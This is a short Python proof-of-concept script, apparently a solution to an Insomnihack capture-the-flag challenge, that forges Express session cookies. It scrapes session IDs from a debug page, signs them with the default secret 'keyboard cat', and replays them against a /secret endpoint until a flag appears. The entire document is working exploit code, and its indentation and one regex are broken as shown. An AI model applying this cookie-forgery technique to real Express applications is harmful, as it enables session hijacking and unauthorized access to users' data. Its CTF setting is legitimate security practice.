poc.py:
```python
import re
import hmac
import base64
import hashlib
import requests

# https://github.com/expressjs/session/search?q=secret&unscoped_q=secret
secret = 'keyboard cat'
# https://devstore.io/js/express-authentication
auth_header = {'Authorization': 'secret'}

def sign(msg, key):
# https://github.com/tj/node-cookie-signature/blob/master/index.js
hashed = hmac.new(msg=msg.encode('utf-8'), key=key.encode('utf-8'), digestmod=hashlib.sha256)
return base64.b64encode(hashed.digest()).decode().rstrip('=')

def get_secret(cookie):
url = 'http://secretus.insomnihack.ch/secret'
resp = requests.get(url, headers=auth_header, cookies=cookie)
return resp.text

def get_debug():
url = 'http://secretus.insomnihack.ch/debug'
match_session = r"

(.+)\.json?

"
resp = requests.get(url, headers=auth_header)
sessions = re.findall(match_session, resp.text)
return sessions

if __name__ == '__main__':
session_list = get_debug()
for sess in session_list:
print(sess)
signed = sign(sess, secret)
cookie = {'connect.sid': 's:' + sess + '.' + signed}
html = get_secret(cookie)

flag_pat = r"INS{.+}"
flag = re.findall(flag_pat, html)
if flag:
print(flag)
break
```